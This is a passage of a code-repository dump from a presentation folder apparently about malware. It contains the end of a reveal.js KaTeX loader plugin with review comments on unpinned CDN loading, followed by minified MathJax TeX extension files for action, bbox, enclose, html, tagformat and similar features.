document.head.append(script) 41 | }) 42 | }; 43 | 44 | /* Loads the given URLs one after another; order matters because auto-render depends on katex being present. */ async function loadScripts(urls) { 45 | for(const url of urls) { 46 | await loadScript(url); 47 | } 48 | } 49 | 50 | return { 51 | id: 'katex', 52 | 53 | init: function (reveal) { 54 | 55 | deck = reveal; 56 | 57 | let revealOptions = deck.getConfig().katex || {}; 58 | 59 | let options = {...defaultOptions, ...revealOptions}; 60 | /* `local`, `version` and `extensions` are pulled out only so that `katexOptions` (passed to auto-render) does not contain them. */ const {local, version, extensions, ...katexOptions} = options; 61 | 62 | /* NOTE(review): without a `local` option the CSS and scripts come from cdn.jsdelivr.net at `@latest` (defaultOptions.version), i.e. an unpinned, moving third-party dependency executed at view time, and loadScript adds no SRI. For a deck that must not change under its author, pin `version` or serve the files via `local`. */ let baseUrl = options.local || 'https://cdn.jsdelivr.net/npm/katex'; 63 | let versionString = options.local ? '' : '@' + options.version; 64 | 65 | let cssUrl = baseUrl + versionString + '/dist/katex.min.css'; 66 | let katexUrl = baseUrl + versionString + '/dist/katex.min.js'; 67 | let mhchemUrl = baseUrl + versionString + '/dist/contrib/mhchem.min.js' 68 | let karUrl = baseUrl + versionString + '/dist/contrib/auto-render.min.js'; 69 | 70 | let katexScripts = [katexUrl]; 71 | if(options.extensions && options.extensions.includes("mhchem")) { 72 | katexScripts.push(mhchemUrl); 73 | } 74 | katexScripts.push(karUrl); 75 | 76 | /* renderMathInElement is the global provided by auto-render.min.js (karUrl), which loadScripts loads last. */ const renderMath = () => { 77 | renderMathInElement(reveal.getSlidesElement(), katexOptions); 78 | deck.layout(); 79 | } 80 | 81 | loadCss(cssUrl); 82 | 83 | // For some reason dynamically loading with defer attribute doesn't result in the expected behavior, the below code does 84 | loadScripts(katexScripts).then(() => { 85 | if( deck.isReady() ) { 86 | renderMath(); 87 | } 88 | else { 89 | /* renderMath is an arrow function, so the .bind(this) here is a no-op. */ deck.on( 'ready', renderMath.bind( this ) ); 90 | } 91 | }); 92 | 93 | } 94 | } 95 | 96 | }; 97 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/mathjax/input/tex/extensions/action.js: -------------------------------------------------------------------------------- 1 | !function(){"use strict";var t,a,o={669:function(t,a,o){Object.defineProperty(a,"__esModule",{value:!0}),a.ActionConfiguration=a.ActionMethods=void 0;var
e=o(251),n=o(193),i=o(871),r=o(360);a.ActionMethods={},a.ActionMethods.Macro=r.default.Macro,a.ActionMethods.Toggle=function(t,a){for(var o,e=[];"\\endtoggle"!==(o=t.GetArgument(a));)e.push(new n.default(o,t.stack.env,t.configuration).mml());t.Push(t.create("node","maction",e,{actiontype:"toggle"}))},a.ActionMethods.Mathtip=function(t,a){var o=t.ParseArg(a),e=t.ParseArg(a);t.Push(t.create("node","maction",[o,e],{actiontype:"tooltip"}))},new i.CommandMap("action-macros",{toggle:"Toggle",mathtip:"Mathtip",texttip:["Macro","\\mathtip{#1}{\\text{#2}}",2]},a.ActionMethods),a.ActionConfiguration=e.Configuration.create("action",{handler:{macro:["action-macros"]}})},955:function(t,a){MathJax._.components.global.isObject,MathJax._.components.global.combineConfig,MathJax._.components.global.combineDefaults,a.r8=MathJax._.components.global.combineWithMathJax,MathJax._.components.global.MathJax},251:function(t,a){Object.defineProperty(a,"__esModule",{value:!0}),a.Configuration=MathJax._.input.tex.Configuration.Configuration,a.ConfigurationHandler=MathJax._.input.tex.Configuration.ConfigurationHandler,a.ParserConfiguration=MathJax._.input.tex.Configuration.ParserConfiguration},871:function(t,a){Object.defineProperty(a,"__esModule",{value:!0}),a.AbstractSymbolMap=MathJax._.input.tex.SymbolMap.AbstractSymbolMap,a.RegExpMap=MathJax._.input.tex.SymbolMap.RegExpMap,a.AbstractParseMap=MathJax._.input.tex.SymbolMap.AbstractParseMap,a.CharacterMap=MathJax._.input.tex.SymbolMap.CharacterMap,a.DelimiterMap=MathJax._.input.tex.SymbolMap.DelimiterMap,a.MacroMap=MathJax._.input.tex.SymbolMap.MacroMap,a.CommandMap=MathJax._.input.tex.SymbolMap.CommandMap,a.EnvironmentMap=MathJax._.input.tex.SymbolMap.EnvironmentMap},193:function(t,a){Object.defineProperty(a,"__esModule",{value:!0}),a.default=MathJax._.input.tex.TexParser.default},360:function(t,a){Object.defineProperty(a,"__esModule",{value:!0}),a.default=MathJax._.input.tex.base.BaseMethods.default}},e={};function n(t){var a=e[t];if(void 
0!==a)return a.exports;var i=e[t]={exports:{}};return o[t](i,i.exports,n),i.exports}t=n(955),a=n(669),(0,t.r8)({_:{input:{tex:{action:{ActionConfiguration:a}}}}})}(); -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/mathjax/input/tex/extensions/bbox.js: -------------------------------------------------------------------------------- 1 | !function(){"use strict";var t,a,e={133:function(t,a,e){Object.defineProperty(a,"__esModule",{value:!0}),a.BboxConfiguration=a.BboxMethods=void 0;var o=e(251),n=e(871),i=e(402);a.BboxMethods={},a.BboxMethods.BBox=function(t,a){for(var e,o,n,u=t.GetBrackets(a,""),l=t.ParseArg(a),x=u.split(/,/),M=0,c=x.length;M=e.length&&(e=void 0),{value:e&&e[n++],done:!e}}};throw new TypeError(t?"Object is not iterable.":"Symbol.iterator is not defined.")};Object.defineProperty(t,"__esModule",{value:!0}),t.CenternotConfiguration=t.filterCenterOver=void 0;var r=a(251),o=a(193),i=a(748),u=a(871),l=a(360);function p(e){var t,a,r=e.data;try{for(var o=n(r.getList("centerOver")),u=o.next();!u.done;u=o.next()){var l=u.value,p=i.default.getTexClass(l.childNodes[0].childNodes[0]);null!==p&&i.default.setProperties(l.parent.parent.parent.parent.parent.parent,{texClass:p})}}catch(e){t={error:e}}finally{try{u&&!u.done&&(a=o.return)&&a.call(o)}finally{if(t)throw t.error}}}new u.CommandMap("centernot",{centerOver:"CenterOver",centernot:["Macro","\\centerOver{#1}{{\u29f8}}",1]},{CenterOver:function(e,t){var a="{"+e.GetArgument(t)+"}",n=e.ParseArg(t),r=new o.default(a,e.stack.env,e.configuration).mml(),i=e.create("node","TeXAtom",[new 
o.default(a,e.stack.env,e.configuration).mml(),e.create("node","mpadded",[e.create("node","mpadded",[n],{width:0,lspace:"-.5width"}),e.create("node","mphantom",[r])],{width:0,lspace:"-.5width"})]);e.configuration.addNode("centerOver",r),e.Push(i)},Macro:l.default.Macro}),t.filterCenterOver=p,t.CenternotConfiguration=r.Configuration.create("centernot",{handler:{macro:["centernot"]},postprocessors:[p]})},955:function(e,t){MathJax._.components.global.isObject,MathJax._.components.global.combineConfig,MathJax._.components.global.combineDefaults,t.r8=MathJax._.components.global.combineWithMathJax,MathJax._.components.global.MathJax},251:function(e,t){Object.defineProperty(t,"__esModule",{value:!0}),t.Configuration=MathJax._.input.tex.Configuration.Configuration,t.ConfigurationHandler=MathJax._.input.tex.Configuration.ConfigurationHandler,t.ParserConfiguration=MathJax._.input.tex.Configuration.ParserConfiguration},748:function(e,t){Object.defineProperty(t,"__esModule",{value:!0}),t.default=MathJax._.input.tex.NodeUtil.default},871:function(e,t){Object.defineProperty(t,"__esModule",{value:!0}),t.AbstractSymbolMap=MathJax._.input.tex.SymbolMap.AbstractSymbolMap,t.RegExpMap=MathJax._.input.tex.SymbolMap.RegExpMap,t.AbstractParseMap=MathJax._.input.tex.SymbolMap.AbstractParseMap,t.CharacterMap=MathJax._.input.tex.SymbolMap.CharacterMap,t.DelimiterMap=MathJax._.input.tex.SymbolMap.DelimiterMap,t.MacroMap=MathJax._.input.tex.SymbolMap.MacroMap,t.CommandMap=MathJax._.input.tex.SymbolMap.CommandMap,t.EnvironmentMap=MathJax._.input.tex.SymbolMap.EnvironmentMap},193:function(e,t){Object.defineProperty(t,"__esModule",{value:!0}),t.default=MathJax._.input.tex.TexParser.default},360:function(e,t){Object.defineProperty(t,"__esModule",{value:!0}),t.default=MathJax._.input.tex.base.BaseMethods.default}},n={};function r(e){var t=n[e];if(void 0!==t)return t.exports;var o=n[e]={exports:{}};return 
a[e].call(o.exports,o,o.exports,r),o.exports}e=r(955),t=r(286),(0,e.r8)({_:{input:{tex:{centernot:{CenternotConfiguration:t}}}}})}(); -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/mathjax/input/tex/extensions/colorv2.js: -------------------------------------------------------------------------------- 1 | !function(){"use strict";var o,a,t={888:function(o,a,t){Object.defineProperty(a,"__esModule",{value:!0}),a.ColorConfiguration=a.ColorV2Methods=void 0;var n=t(871),e=t(251);a.ColorV2Methods={Color:function(o,a){var t=o.GetArgument(a),n=o.stack.env.color;o.stack.env.color=t;var e=o.ParseArg(a);n?o.stack.env.color=n:delete o.stack.env.color;var r=o.create("node","mstyle",[e],{mathcolor:t});o.Push(r)}},new n.CommandMap("colorv2",{color:"Color"},a.ColorV2Methods),a.ColorConfiguration=e.Configuration.create("colorv2",{handler:{macro:["colorv2"]}})},955:function(o,a){MathJax._.components.global.isObject,MathJax._.components.global.combineConfig,MathJax._.components.global.combineDefaults,a.r8=MathJax._.components.global.combineWithMathJax,MathJax._.components.global.MathJax},251:function(o,a){Object.defineProperty(a,"__esModule",{value:!0}),a.Configuration=MathJax._.input.tex.Configuration.Configuration,a.ConfigurationHandler=MathJax._.input.tex.Configuration.ConfigurationHandler,a.ParserConfiguration=MathJax._.input.tex.Configuration.ParserConfiguration},871:function(o,a){Object.defineProperty(a,"__esModule",{value:!0}),a.AbstractSymbolMap=MathJax._.input.tex.SymbolMap.AbstractSymbolMap,a.RegExpMap=MathJax._.input.tex.SymbolMap.RegExpMap,a.AbstractParseMap=MathJax._.input.tex.SymbolMap.AbstractParseMap,a.CharacterMap=MathJax._.input.tex.SymbolMap.CharacterMap,a.DelimiterMap=MathJax._.input.tex.SymbolMap.DelimiterMap,a.MacroMap=MathJax._.input.tex.SymbolMap.MacroMap,a.CommandMap=MathJax._.input.tex.SymbolMap.CommandMap,a.EnvironmentMap=MathJax._.input.tex.SymbolMap.EnvironmentMap}},n={};function 
e(o){var a=n[o];if(void 0!==a)return a.exports;var r=n[o]={exports:{}};return t[o](r,r.exports,e),r.exports}o=e(955),a=e(888),(0,o.r8)({_:{input:{tex:{colorv2:{ColorV2Configuration:a}}}}})}(); -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/mathjax/input/tex/extensions/enclose.js: -------------------------------------------------------------------------------- 1 | !function(){"use strict";var a,t,e={272:function(a,t,e){Object.defineProperty(t,"__esModule",{value:!0}),t.EncloseConfiguration=t.EncloseMethods=t.ENCLOSE_OPTIONS=void 0;var o=e(251),n=e(871),r=e(398);t.ENCLOSE_OPTIONS={"data-arrowhead":1,color:1,mathcolor:1,background:1,mathbackground:1,"data-padding":1,"data-thickness":1},t.EncloseMethods={},t.EncloseMethods.Enclose=function(a,e){var o=a.GetArgument(e).replace(/,/g," "),n=a.GetBrackets(e,""),i=a.ParseArg(e),l=r.default.keyvalOptions(n,t.ENCLOSE_OPTIONS);l.notation=o,a.Push(a.create("node","menclose",[i],l))},new 
n.CommandMap("enclose",{enclose:"Enclose"},t.EncloseMethods),t.EncloseConfiguration=o.Configuration.create("enclose",{handler:{macro:["enclose"]}})},955:function(a,t){MathJax._.components.global.isObject,MathJax._.components.global.combineConfig,MathJax._.components.global.combineDefaults,t.r8=MathJax._.components.global.combineWithMathJax,MathJax._.components.global.MathJax},251:function(a,t){Object.defineProperty(t,"__esModule",{value:!0}),t.Configuration=MathJax._.input.tex.Configuration.Configuration,t.ConfigurationHandler=MathJax._.input.tex.Configuration.ConfigurationHandler,t.ParserConfiguration=MathJax._.input.tex.Configuration.ParserConfiguration},398:function(a,t){Object.defineProperty(t,"__esModule",{value:!0}),t.default=MathJax._.input.tex.ParseUtil.default},871:function(a,t){Object.defineProperty(t,"__esModule",{value:!0}),t.AbstractSymbolMap=MathJax._.input.tex.SymbolMap.AbstractSymbolMap,t.RegExpMap=MathJax._.input.tex.SymbolMap.RegExpMap,t.AbstractParseMap=MathJax._.input.tex.SymbolMap.AbstractParseMap,t.CharacterMap=MathJax._.input.tex.SymbolMap.CharacterMap,t.DelimiterMap=MathJax._.input.tex.SymbolMap.DelimiterMap,t.MacroMap=MathJax._.input.tex.SymbolMap.MacroMap,t.CommandMap=MathJax._.input.tex.SymbolMap.CommandMap,t.EnvironmentMap=MathJax._.input.tex.SymbolMap.EnvironmentMap}},o={};function n(a){var t=o[a];if(void 0!==t)return t.exports;var r=o[a]={exports:{}};return e[a](r,r.exports,n),r.exports}a=n(955),t=n(272),(0,a.r8)({_:{input:{tex:{enclose:{EncloseConfiguration:t}}}}})}(); -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/mathjax/input/tex/extensions/extpfeil.js: -------------------------------------------------------------------------------- 1 | !function(){"use strict";var t,e,a={646:function(t,e,a){Object.defineProperty(e,"__esModule",{value:!0}),e.ExtpfeilConfiguration=e.ExtpfeilMethods=void 0;var 
o=a(251),n=a(871),r=a(939),i=a(892),u=a(417),x=a(402);e.ExtpfeilMethods={},e.ExtpfeilMethods.xArrow=r.AmsMethods.xArrow,e.ExtpfeilMethods.NewExtArrow=function(t,a){var o=t.GetArgument(a),n=t.GetArgument(a),r=t.GetArgument(a);if(!o.match(/^\\([a-z]+|.)$/i))throw new x.default("NewextarrowArg1","First argument to %1 must be a control sequence name",a);if(!n.match(/^(\d+),(\d+)$/))throw new x.default("NewextarrowArg2","Second argument to %1 must be two integers separated by a comma",a);if(!r.match(/^(\d+|0x[0-9A-F]+)$/i))throw new x.default("NewextarrowArg3","Third argument to %1 must be a unicode character number",a);o=o.substr(1);var u=n.split(",");i.default.addMacro(t,o,e.ExtpfeilMethods.xArrow,[parseInt(r),parseInt(u[0]),parseInt(u[1])])},new n.CommandMap("extpfeil",{xtwoheadrightarrow:["xArrow",8608,12,16],xtwoheadleftarrow:["xArrow",8606,17,13],xmapsto:["xArrow",8614,6,7],xlongequal:["xArrow",61,7,7],xtofrom:["xArrow",8644,12,12],Newextarrow:"NewExtArrow"},e.ExtpfeilMethods);e.ExtpfeilConfiguration=o.Configuration.create("extpfeil",{handler:{macro:["extpfeil"]},init:function(t){u.NewcommandConfiguration.init(t)}})},955:function(t,e){MathJax._.components.global.isObject,MathJax._.components.global.combineConfig,MathJax._.components.global.combineDefaults,e.r8=MathJax._.components.global.combineWithMathJax,MathJax._.components.global.MathJax},251:function(t,e){Object.defineProperty(e,"__esModule",{value:!0}),e.Configuration=MathJax._.input.tex.Configuration.Configuration,e.ConfigurationHandler=MathJax._.input.tex.Configuration.ConfigurationHandler,e.ParserConfiguration=MathJax._.input.tex.Configuration.ParserConfiguration},871:function(t,e){Object.defineProperty(e,"__esModule",{value:!0}),e.AbstractSymbolMap=MathJax._.input.tex.SymbolMap.AbstractSymbolMap,e.RegExpMap=MathJax._.input.tex.SymbolMap.RegExpMap,e.AbstractParseMap=MathJax._.input.tex.SymbolMap.AbstractParseMap,e.CharacterMap=MathJax._.input.tex.SymbolMap.CharacterMap,e.DelimiterMap=MathJax._.input.tex.Sy
mbolMap.DelimiterMap,e.MacroMap=MathJax._.input.tex.SymbolMap.MacroMap,e.CommandMap=MathJax._.input.tex.SymbolMap.CommandMap,e.EnvironmentMap=MathJax._.input.tex.SymbolMap.EnvironmentMap},402:function(t,e){Object.defineProperty(e,"__esModule",{value:!0}),e.default=MathJax._.input.tex.TexError.default},939:function(t,e){Object.defineProperty(e,"__esModule",{value:!0}),e.AmsMethods=MathJax._.input.tex.ams.AmsMethods.AmsMethods,e.NEW_OPS=MathJax._.input.tex.ams.AmsMethods.NEW_OPS},417:function(t,e){Object.defineProperty(e,"__esModule",{value:!0}),e.NewcommandConfiguration=MathJax._.input.tex.newcommand.NewcommandConfiguration.NewcommandConfiguration},892:function(t,e){Object.defineProperty(e,"__esModule",{value:!0}),e.default=MathJax._.input.tex.newcommand.NewcommandUtil.default}},o={};function n(t){var e=o[t];if(void 0!==e)return e.exports;var r=o[t]={exports:{}};return a[t](r,r.exports,n),r.exports}t=n(955),e=n(646),(0,t.r8)({_:{input:{tex:{extpfeil:{ExtpfeilConfiguration:e}}}}})}(); -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/mathjax/input/tex/extensions/gensymb.js: -------------------------------------------------------------------------------- 1 | !function(){"use strict";var a,t,n={82:function(a,t,n){Object.defineProperty(t,"__esModule",{value:!0}),t.GensymbConfiguration=void 0;var e=n(251),o=n(108);new(n(871).CharacterMap)("gensymb-symbols",(function(a,t){var n=t.attributes||{};n.mathvariant=o.TexConstant.Variant.NORMAL,n.class="MathML-Unit";var 
e=a.create("token","mi",n,t.char);a.Push(e)}),{ohm:"\u2126",degree:"\xb0",celsius:"\u2103",perthousand:"\u2030",micro:"\xb5"}),t.GensymbConfiguration=e.Configuration.create("gensymb",{handler:{macro:["gensymb-symbols"]}})},955:function(a,t){MathJax._.components.global.isObject,MathJax._.components.global.combineConfig,MathJax._.components.global.combineDefaults,t.r8=MathJax._.components.global.combineWithMathJax,MathJax._.components.global.MathJax},251:function(a,t){Object.defineProperty(t,"__esModule",{value:!0}),t.Configuration=MathJax._.input.tex.Configuration.Configuration,t.ConfigurationHandler=MathJax._.input.tex.Configuration.ConfigurationHandler,t.ParserConfiguration=MathJax._.input.tex.Configuration.ParserConfiguration},871:function(a,t){Object.defineProperty(t,"__esModule",{value:!0}),t.AbstractSymbolMap=MathJax._.input.tex.SymbolMap.AbstractSymbolMap,t.RegExpMap=MathJax._.input.tex.SymbolMap.RegExpMap,t.AbstractParseMap=MathJax._.input.tex.SymbolMap.AbstractParseMap,t.CharacterMap=MathJax._.input.tex.SymbolMap.CharacterMap,t.DelimiterMap=MathJax._.input.tex.SymbolMap.DelimiterMap,t.MacroMap=MathJax._.input.tex.SymbolMap.MacroMap,t.CommandMap=MathJax._.input.tex.SymbolMap.CommandMap,t.EnvironmentMap=MathJax._.input.tex.SymbolMap.EnvironmentMap},108:function(a,t){Object.defineProperty(t,"__esModule",{value:!0}),t.TexConstant=MathJax._.input.tex.TexConstants.TexConstant}},e={};function o(a){var t=e[a];if(void 0!==t)return t.exports;var i=e[a]={exports:{}};return n[a](i,i.exports,o),i.exports}a=o(955),t=o(82),(0,a.r8)({_:{input:{tex:{gensymb:{GensymbConfiguration:t}}}}})}(); -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/mathjax/input/tex/extensions/html.js: -------------------------------------------------------------------------------- 1 | !function(){"use strict";var t,a,e,n={738:function(t,a,e){Object.defineProperty(a,"__esModule",{value:!0}),a.HtmlConfiguration=void 0;var 
n=e(251),r=e(871),o=e(248);new r.CommandMap("html_macros",{href:"Href",class:"Class",style:"Style",cssId:"Id"},o.default),a.HtmlConfiguration=n.Configuration.create("html",{handler:{macro:["html_macros"]}})},248:function(t,a,e){Object.defineProperty(a,"__esModule",{value:!0});var n=e(748),r={Href:function(t,a){var e=t.GetArgument(a),r=o(t,a);n.default.setAttribute(r,"href",e),t.Push(r)},Class:function(t,a){var e=t.GetArgument(a),r=o(t,a),i=n.default.getAttribute(r,"class");i&&(e=i+" "+e),n.default.setAttribute(r,"class",e),t.Push(r)},Style:function(t,a){var e=t.GetArgument(a),r=o(t,a),i=n.default.getAttribute(r,"style");i&&(";"!==e.charAt(e.length-1)&&(e+=";"),e=i+" "+e),n.default.setAttribute(r,"style",e),t.Push(r)},Id:function(t,a){var e=t.GetArgument(a),r=o(t,a);n.default.setAttribute(r,"id",e),t.Push(r)}},o=function(t,a){var e=t.ParseArg(a);if(!n.default.isInferred(e))return e;var r=n.default.getChildren(e);if(1===r.length)return r[0];var o=t.create("node","mrow");return n.default.copyChildren(e,o),n.default.copyAttributes(e,o),o};a.default=r},955:function(t,a){MathJax._.components.global.isObject,MathJax._.components.global.combineConfig,MathJax._.components.global.combineDefaults,a.r8=MathJax._.components.global.combineWithMathJax,MathJax._.components.global.MathJax},251:function(t,a){Object.defineProperty(a,"__esModule",{value:!0}),a.Configuration=MathJax._.input.tex.Configuration.Configuration,a.ConfigurationHandler=MathJax._.input.tex.Configuration.ConfigurationHandler,a.ParserConfiguration=MathJax._.input.tex.Configuration.ParserConfiguration},748:function(t,a){Object.defineProperty(a,"__esModule",{value:!0}),a.default=MathJax._.input.tex.NodeUtil.default},871:function(t,a){Object.defineProperty(a,"__esModule",{value:!0}),a.AbstractSymbolMap=MathJax._.input.tex.SymbolMap.AbstractSymbolMap,a.RegExpMap=MathJax._.input.tex.SymbolMap.RegExpMap,a.AbstractParseMap=MathJax._.input.tex.SymbolMap.AbstractParseMap,a.CharacterMap=MathJax._.input.tex.SymbolMap.Charact
erMap,a.DelimiterMap=MathJax._.input.tex.SymbolMap.DelimiterMap,a.MacroMap=MathJax._.input.tex.SymbolMap.MacroMap,a.CommandMap=MathJax._.input.tex.SymbolMap.CommandMap,a.EnvironmentMap=MathJax._.input.tex.SymbolMap.EnvironmentMap}},r={};function o(t){var a=r[t];if(void 0!==a)return a.exports;var e=r[t]={exports:{}};return n[t](e,e.exports,o),e.exports}t=o(955),a=o(738),e=o(248),(0,t.r8)({_:{input:{tex:{html:{HtmlConfiguration:a,HtmlMethods:e}}}}})}(); -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/mathjax/input/tex/extensions/noerrors.js: -------------------------------------------------------------------------------- 1 | !function(){"use strict";var o,n,r={634:function(o,n,r){Object.defineProperty(n,"__esModule",{value:!0}),n.NoErrorsConfiguration=void 0;var t=r(251);n.NoErrorsConfiguration=t.Configuration.create("noerrors",{nodes:{error:function(o,n,r,t){var e=o.create("token","mtext",{},t.replace(/\n/g," "));return o.create("node","merror",[e],{"data-mjx-error":n,title:n})}}})},955:function(o,n){MathJax._.components.global.isObject,MathJax._.components.global.combineConfig,MathJax._.components.global.combineDefaults,n.r8=MathJax._.components.global.combineWithMathJax,MathJax._.components.global.MathJax},251:function(o,n){Object.defineProperty(n,"__esModule",{value:!0}),n.Configuration=MathJax._.input.tex.Configuration.Configuration,n.ConfigurationHandler=MathJax._.input.tex.Configuration.ConfigurationHandler,n.ParserConfiguration=MathJax._.input.tex.Configuration.ParserConfiguration}},t={};function e(o){var n=t[o];if(void 0!==n)return n.exports;var a=t[o]={exports:{}};return r[o](a,a.exports,e),a.exports}o=e(955),n=e(634),(0,o.r8)({_:{input:{tex:{noerrors:{NoErrorsConfiguration:n}}}}})}(); -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/mathjax/input/tex/extensions/noundefined.js: 
--------------------------------------------------------------------------------
// Vendored, minified MathJax 3 build of the TeX "noundefined" extension
// (webpack bundle: the numeric keys are module ids, and modules 955/251 are
// shims that read the already-loaded MathJax core through the MathJax._
// namespace rather than bundling it again).
// What it does: registers a Configuration named "noundefined" (priority 3)
// whose macro fallback turns an unknown control sequence into an <mtext>
// holding the literal "\name"; mathcolor / mathbackground / mathsize are set
// from the `noundefined` options when non-empty (defaults: color "red",
// background "", size ""). The fallback pushes a node instead of throwing,
// so an undefined macro is rendered, not reported as a parse error.
// Do not edit this line by hand; regenerate it from the MathJax sources of
// the same version instead.
!function(){"use strict";var n,o,t={999:function(n,o,t){var e=this&&this.__values||function(n){var o="function"==typeof Symbol&&Symbol.iterator,t=o&&n[o],e=0;if(t)return t.call(n);if(n&&"number"==typeof n.length)return{next:function(){return n&&e>=n.length&&(n=void 0),{value:n&&n[e++],done:!n}}};throw new TypeError(o?"Object is not iterable.":"Symbol.iterator is not defined.")};Object.defineProperty(o,"__esModule",{value:!0}),o.NoUndefinedConfiguration=void 0;var r=t(251);o.NoUndefinedConfiguration=r.Configuration.create("noundefined",{fallback:{macro:function(n,o){var t,r,i=n.create("text","\\"+o),a=n.options.noundefined||{},u={};try{for(var f=e(["color","background","size"]),l=f.next();!l.done;l=f.next()){var c=l.value;a[c]&&(u["math"+c]=a[c])}}catch(n){t={error:n}}finally{try{l&&!l.done&&(r=f.return)&&r.call(f)}finally{if(t)throw t.error}}n.Push(n.create("node","mtext",[],u,i))}},options:{noundefined:{color:"red",background:"",size:""}},priority:3})},955:function(n,o){MathJax._.components.global.isObject,MathJax._.components.global.combineConfig,MathJax._.components.global.combineDefaults,o.r8=MathJax._.components.global.combineWithMathJax,MathJax._.components.global.MathJax},251:function(n,o){Object.defineProperty(o,"__esModule",{value:!0}),o.Configuration=MathJax._.input.tex.Configuration.Configuration,o.ConfigurationHandler=MathJax._.input.tex.Configuration.ConfigurationHandler,o.ParserConfiguration=MathJax._.input.tex.Configuration.ParserConfiguration}},e={};function r(n){var o=e[n];if(void 0!==o)return o.exports;var i=e[n]={exports:{}};return t[n].call(i.exports,i,i.exports,r),i.exports}n=r(955),o=r(999),(0,n.r8)({_:{input:{tex:{noundefined:{NoUndefinedConfiguration:o}}}}})}();
-------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/mathjax/input/tex/extensions/tagformat.js: 
-------------------------------------------------------------------------------- 1 | !function(){"use strict";var t,o,n={941:function(t,o,n){var a,r=this&&this.__extends||(a=function(t,o){return(a=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,o){t.__proto__=o}||function(t,o){for(var n in o)Object.prototype.hasOwnProperty.call(o,n)&&(t[n]=o[n])})(t,o)},function(t,o){if("function"!=typeof o&&null!==o)throw new TypeError("Class extends value "+String(o)+" is not a constructor or null");function n(){this.constructor=t}a(t,o),t.prototype=null===o?Object.create(o):(n.prototype=o.prototype,new n)});Object.defineProperty(o,"__esModule",{value:!0}),o.TagFormatConfiguration=o.tagformatConfig=void 0;var e=n(251),i=n(680),s=0;function u(t,o){var n=o.parseOptions.options.tags;"base"!==n&&t.tags.hasOwnProperty(n)&&i.TagsFactory.add(n,t.tags[n]);var a=function(t){function n(){return null!==t&&t.apply(this,arguments)||this}return r(n,t),n.prototype.formatNumber=function(t){return o.parseOptions.options.tagformat.number(t)},n.prototype.formatTag=function(t){return o.parseOptions.options.tagformat.tag(t)},n.prototype.formatId=function(t){return o.parseOptions.options.tagformat.id(t)},n.prototype.formatUrl=function(t,n){return o.parseOptions.options.tagformat.url(t,n)},n}(i.TagsFactory.create(o.parseOptions.options.tags).constructor),e="configTags-"+ ++s;i.TagsFactory.add(e,a),o.parseOptions.options.tags=e}o.tagformatConfig=u,o.TagFormatConfiguration=e.Configuration.create("tagformat",{config:[u,10],options:{tagformat:{number:function(t){return t.toString()},tag:function(t){return"("+t+")"},id:function(t){return"mjx-eqn:"+t.replace(/\s/g,"_")},url:function(t,o){return 
o+"#"+encodeURIComponent(t)}}}})},955:function(t,o){MathJax._.components.global.isObject,MathJax._.components.global.combineConfig,MathJax._.components.global.combineDefaults,o.r8=MathJax._.components.global.combineWithMathJax,MathJax._.components.global.MathJax},251:function(t,o){Object.defineProperty(o,"__esModule",{value:!0}),o.Configuration=MathJax._.input.tex.Configuration.Configuration,o.ConfigurationHandler=MathJax._.input.tex.Configuration.ConfigurationHandler,o.ParserConfiguration=MathJax._.input.tex.Configuration.ParserConfiguration},680:function(t,o){Object.defineProperty(o,"__esModule",{value:!0}),o.Label=MathJax._.input.tex.Tags.Label,o.TagInfo=MathJax._.input.tex.Tags.TagInfo,o.AbstractTags=MathJax._.input.tex.Tags.AbstractTags,o.NoTags=MathJax._.input.tex.Tags.NoTags,o.AllTags=MathJax._.input.tex.Tags.AllTags,o.TagsFactory=MathJax._.input.tex.Tags.TagsFactory}},a={};function r(t){var o=a[t];if(void 0!==o)return o.exports;var e=a[t]={exports:{}};return n[t].call(e.exports,e,e.exports,r),e.exports}t=r(955),o=r(941),(0,t.r8)({_:{input:{tex:{tagformat:{TagFormatConfiguration:o}}}}})}(); -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/math/mathjax/input/tex/extensions/unicode.js: -------------------------------------------------------------------------------- 1 | !function(){"use strict";var t,e,a={376:function(t,e,a){Object.defineProperty(e,"__esModule",{value:!0}),e.UnicodeConfiguration=e.UnicodeMethods=void 0;var n=a(251),o=a(402),i=a(871),r=a(398),u=a(748),l=a(992);e.UnicodeMethods={};var c={};e.UnicodeMethods.Unicode=function(t,e){var a=t.GetBrackets(e),n=null,i=null;a&&(a.replace(/ /g,"").match(/^(\d+(\.\d*)?|\.\d+),(\d+(\.\d*)?|\.\d+)$/)?(n=a.replace(/ /g,"").split(/,/),i=t.GetBrackets(e)):i=a);var p=r.default.trimSpaces(t.GetArgument(e)).replace(/^0x/,"x");if(!p.match(/^(x[0-9A-Fa-f]+|[0-9]+)$/))throw new o.default("BadUnicode","Argument to \\unicode must be a number");var 
M=parseInt(p.match(/^x/)?"0"+p:p);c[M]?i||(i=c[M][2]):c[M]=[800,200,i,M],n&&(c[M][0]=Math.floor(1e3*parseFloat(n[0])),c[M][1]=Math.floor(1e3*parseFloat(n[1])));var d=t.stack.env.font,s={};i?(c[M][2]=s.fontfamily=i.replace(/'/g,"'"),d&&(d.match(/bold/)&&(s.fontweight="bold"),d.match(/italic|-mathit/)&&(s.fontstyle="italic"))):d&&(s.mathvariant=d);var x=t.create("token","mtext",s,l.numeric(p));u.default.setProperty(x,"unicode",!0),t.Push(x)},new 